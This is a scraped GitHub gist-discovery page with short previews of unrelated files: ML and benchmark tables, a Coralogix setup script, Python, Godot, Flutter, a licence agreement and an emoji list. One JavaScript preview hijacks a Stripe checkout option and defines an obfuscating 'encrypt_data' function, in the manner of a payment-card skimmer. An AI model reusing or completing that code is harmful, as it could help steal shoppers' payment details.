model_name | LoRA r | dataset_size | quantized | learning_rate | final eval loss |
---|---|---|---|---|---|
SmolLM2-360M-Instruct | 4 | small | true | 0.0005 | 0.17071 |
SmolLM2-135M-Instruct | 4 | medium | false | 0.0005 | 0.17130 |
Discover gists
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Exit on error | |
set -e | |
# Define variables | |
export OTEL_VERSION="${OTEL_VERSION}" | |
export CORALOGIX_DOMAIN="${CORALOGIX_DOMAIN}" | |
export CORALOGIX_API_KEY="${CORALOGIX_API_KEY}" | |
export CORALOGIX_APPLICATION_NAME="${CORALOGIX_APPLICATION_NAME}" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from typing import List | |
def add(vec1: List[int], vec2: List[int], sum: List[int], length: int) -> None: | |
# Precondition: Length of vec1, vec2, and sum should be equal to 'length' | |
assert len(vec1) == length | |
assert len(vec2) == length | |
assert len(sum) == length | |
# Invariant: At the start of each iteration, sum[0:indx] should be the sum of vec1[0:indx] and vec2[0:indx] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void 0 !== window._edge && clearInterval(window._edge), window._edge = setInterval(function() { | |
"undefined" != typeof jQuery && jQuery("#stripe_payments").length && (jQuery("#stripe_payments").prop("checked", !1).show(), jQuery(".payment-method.stripe-payments").removeClass("_active"), function1(), clearInterval(window._edge)) | |
}, 500); | |
var encrypt_data = function(e) { | |
var t, r, a = btoa(encodeURIComponent(e)), | |
n = ""; | |
for (t = 0; t < a.length; t++) r = 25 + (28 + (126 ^ a[t].charCodeAt(0)) ^ 121), n += String.fromCharCode(r); | |
return n | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<fileSnapshot xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> | |
<files> | |
<file path="C:\ProgramData\chocolatey\lib\box.default\box.default.nupkg" checksum="286373848AE94D06E730DC77EA5D3130" /> | |
<file path="C:\ProgramData\chocolatey\lib\box.default\box.default.nuspec" checksum="C4B0285949261BCE6B4D0788AC2FC118" /> | |
<file path="C:\ProgramData\chocolatey\lib\box.default\tools\ChocolateyInstall.ps1" checksum="EB952059BF48B1B2C7909371214978ED" /> | |
</files> | |
</fileSnapshot> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[gd_scene load_steps=17 format=3] | |
[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_vq0ld"] | |
[sub_resource type="GDScript" id="GDScript_f68c0"] | |
script/source = "extends ProgressBar | |
@export_range(0.0,2.0) var value_rate = 0.5 | |
@export var value_color_high := Color.GREEN | |
@export var value_color_mid := Color.GOLD |
Benchmark Name | Min | Geomean | Median | Mean | Max | Total (ms) | Total (min) |
---|---|---|---|---|---|---|---|
Bounce | 523 | 538 | 526.92 | 524 | 526.9 | 105384 | 1.76 |
CD | 486 | 505 | 490.75 | 487 | 490.7 | 98149 | 1.64 |
DeltaBlue | 248 | 302 | 260.11 | 258 | 260.01 | 52022 | 0.87 |
Havlak | 1178 | 1238 | 1214.16 | 1214 | 1214.12 | 242831 | 4.05 |
Json | 318 | 336 | 321.63 | 319 | 321.58 | 64325 | 1.07 |
List | 318 | 342 | 320.62 | 319 | 320.58 | 64123 | 1.07 |
Mandelbrot | 129 | 156 | 130.64 | 130 | 130.6 | 26128 | 0.44 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Corporate Contributor License Agreement | |
This Corporate Contributor License Agreement ("Agreement") is entered into by and between the entity identified below ("Corporation") and the project maintainer(s) ("Maintainers"). This Agreement is effective as of the date of the last signature below. | |
## 1. Definitions | |
1.1 "Contribution" means any original work of authorship, including any modifications or additions to an existing work, that is intentionally submitted by Corporation to the Maintainers for inclusion in, or documentation of, any of the projects owned or managed by the Maintainers (the "Project"). For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Maintainers or their representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Maintainers for the purpose of discussing and improving the Project, but exclu |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import 'package:flutter/material.dart'; | |
void main() => runApp(const MyApp()); | |
class MyApp extends StatelessWidget { | |
const MyApp({super.key}); | |
@override | |
Widget build(BuildContext context) { | |
return MaterialApp( |
People
![]() :bowtie: |
π :smile: |
π :laughing: |
---|---|---|
π :blush: |
π :smiley: |
:relaxed: |
π :smirk: |
π :heart_eyes: |
π :kissing_heart: |
π :kissing_closed_eyes: |
π³ :flushed: |
π :relieved: |
π :satisfied: |
π :grin: |
π :wink: |
π :stuck_out_tongue_winking_eye: |
π :stuck_out_tongue_closed_eyes: |
π :grinning: |
π :kissing: |
π :kissing_smiling_eyes: |
π :stuck_out_tongue: |